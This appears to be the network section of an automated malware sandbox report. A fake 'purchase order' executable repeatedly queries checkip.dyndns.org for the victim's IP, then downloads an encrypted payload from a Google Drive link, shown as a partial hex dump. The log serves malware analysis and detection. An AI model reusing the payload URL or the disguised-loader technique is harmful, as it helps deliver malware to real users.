                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 0395a5a7e264ff947143007ee9d193f9
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.549833132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:09.131577969 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:19.378699064 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:19 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: cb4df60cbd8e60b20cd155eeb0a29df2
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.549864132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:21.603665113 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:23.809283972 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:23 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 78fc99b73e33d1d5a47f87a8ebbc1ef3
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.549877132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:26.205121994 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:28.553240061 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:28 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 9d3557130314f3602e56edf262d1fbac
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  10192.168.2.549889132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:30.846122026 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:32.161087990 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:31 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: dd76d74befc7552e2cd49295447fc8ac
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  11192.168.2.549899132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:34.371108055 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:35.676954031 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:35 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 028e7e640559797d8e7b48c44d23b35f
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  12192.168.2.549908132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:37.811099052 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:40.115158081 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: d5f797c4048e579277417e64004725d9
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  13192.168.2.549923132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:42.523655891 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:43.826448917 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:43 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 0ffa5e611f5631924d04246ae6fd38df
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  14192.168.2.549931132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:45.977520943 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:48.282063961 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:48 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: c25bc7f3b90bcd2de4a52b7c719db26a
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  15192.168.2.549942132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:50.445310116 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:51.756139040 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:51 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 944ea4f58e67109016f61d0855bec76c
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  16192.168.2.549952132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:53.903964043 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:55.210642099 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:55 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: b1323cfa88068d754c10517fef6a21b4
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  17192.168.2.549961132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:57.381041050 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:59.684894085 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:59 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 8e8c5d1f523c965446131a1ba362c280
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  18192.168.2.549973132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:31:01.950740099 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:31:03.239947081 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:31:03 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: a51d39ffc99cae30a2257abd06f4e604
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.549713216.58.208.2384434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:29:23 UTC216OUTGET /uc?export=download&id=1Fkj4gGqaXE73Hj9YlotqtNXQVxX9XFtG HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                  Host: drive.google.com
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  2024-12-19 14:29:23 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:23 GMT
                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=1Fkj4gGqaXE73Hj9YlotqtNXQVxX9XFtG&export=download
                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                  Content-Security-Policy: script-src 'nonce-9ApCNxz-yMfRpIF_TXliHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.549720172.217.17.654434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:29:25 UTC258OUTGET /download?id=1Fkj4gGqaXE73Hj9YlotqtNXQVxX9XFtG&export=download HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:29:28 UTC4941INHTTP/1.1 200 OK
                                                                                                                                  X-GUploader-UploadID: AFiumC65BOpoTfzK7B8xG9jJkuk_aiNy8kFDDoHlP4gYJY4nXa-UrmQ2CRaFGbfgzmsDaWCV6aM21lc
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Content-Disposition: attachment; filename="TpHZofBPQVl182.bin"
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 94272
                                                                                                                                  Last-Modified: Mon, 16 Dec 2024 21:10:03 GMT
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:28 GMT
                                                                                                                                  Expires: Thu, 19 Dec 2024 14:29:28 GMT
                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                  X-Goog-Hash: crc32c=OeUg8w==
                                                                                                                                  Server: UploadServer
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close
                                                                                                                                  2024-12-19 14:29:28 UTC4941INData Raw: ec 22 dc 5c 1a dc 93 97 34 8b b6 f9 e3 83 45 6f 73 3a 4e 22 bf a3 c4 84 8a 16 9c 20 3a e1 0b d5 43 58 3b 6d 93 24 8c 39 f7 c0 08 fd f6 b5 b7 82 20 fd 3f 64 8b aa 93 d4 37 1f b4 7a ee ac 80 d1 3d 08 07 06 2e f3 48 3e 53 9f 41 8a b0 6b 55 43 f3 aa 4b 1a 7a b1 f4 6e e7 de 7c 1d ee 54 a7 10 d9 4e 45 4f 13 37 50 53 7c 95 4c e4 d5 58 fb e3 4b 7e fa 3c 82 50 c5 ff 7d fb c2 9c 1a e2 bb 8b 23 51 65 32 a6 b5 c2 45 f3 0b 18 88 7e ed 05 ea 3f 0a 94 00 5e d8 8c ed ba f6 ce 3a e6 c6 32 8b 82 63 d5 37 5e 30 3c 5b d3 53 ac 42 63 84 37 54 e6 ed c4 e9 48 02 c1 9f 00 be d2 ae 28 f0 21 1a 0a 99 d8 40 5a 58 77 97 fe b9 b2 33 c8 b4 b9 f8 64 3a d0 fb 8b e6 02 84 0a b2 6d f4 16 14 d8 d9 9f 78 fe 24 96 b6 55 bc 2d 2d 2d 46 a4 c8 41 c7 52 87 10 31 b0 a7 f2 d5 97 81 74 5d 54 b3 3b
                                                                                                                                  Data Ascii: "\4Eos:N" :CX;m$9 ?d7z=.H>SAkUCKzn|TNEO7PS|LXK~<P}#Qe2E~?^:2c7^0<[SBc7TH(!@ZXw3d:mx$U---FAR1t]T;
                                                                                                                                  2024-12-19 14:29:28 UTC4816INData Raw: 19 0d 5d dd 3a 07 29 b7 14 48 3d 48 88 16 5d 71 98 18 b2 cb 9b 99 08 2f 05 b1 f0 c3 ba 2c 09 07 93 7a 22 20 ef 7e c2 1b 60 b8 88 53 11 7a 19 e7 6d a2 45 8c 84 69 a7 8f 4f 79 3a 04 61 56 9d 3f 9a fd b2 cb 52 9c 8d 75 43 1b ab bb 7c 8c aa 29 22 0c fb 38 c5 8e cf 65 4c fa 46 22 fd e3 28 4c 6a 35 9b cf bf d8 6f 3d 0d 44 3b 67 67 7c ef 38 63 e9 85 49 8e bd 17 87 d6 43 19 c0 5d 81 b1 6c 0f 6c 5c 5c 9e f1 43 c8 36 4e 05 76 72 9e cc d6 3a 37 3a ee f4 84 09 4a b5 27 72 a5 26 bf 7e f3 3b 83 12 54 2b e2 d9 13 0f e4 7e 81 3e e0 15 33 91 27 a2 47 cc 10 1a 61 24 ff f9 48 bc 26 3d ea cf 28 2f b5 f9 e4 eb 4c 66 53 cd 04 58 0b 6d 2a 3f 00 c3 f5 1a ee 11 7a a8 86 95 1a 0b c1 26 41 19 94 3e 6f 9d 24 d4 7d 65 2b 04 3a 41 25 44 7e d6 6d d4 f0 fa 7c b9 be 5b cc 41 e1 bf 26 09
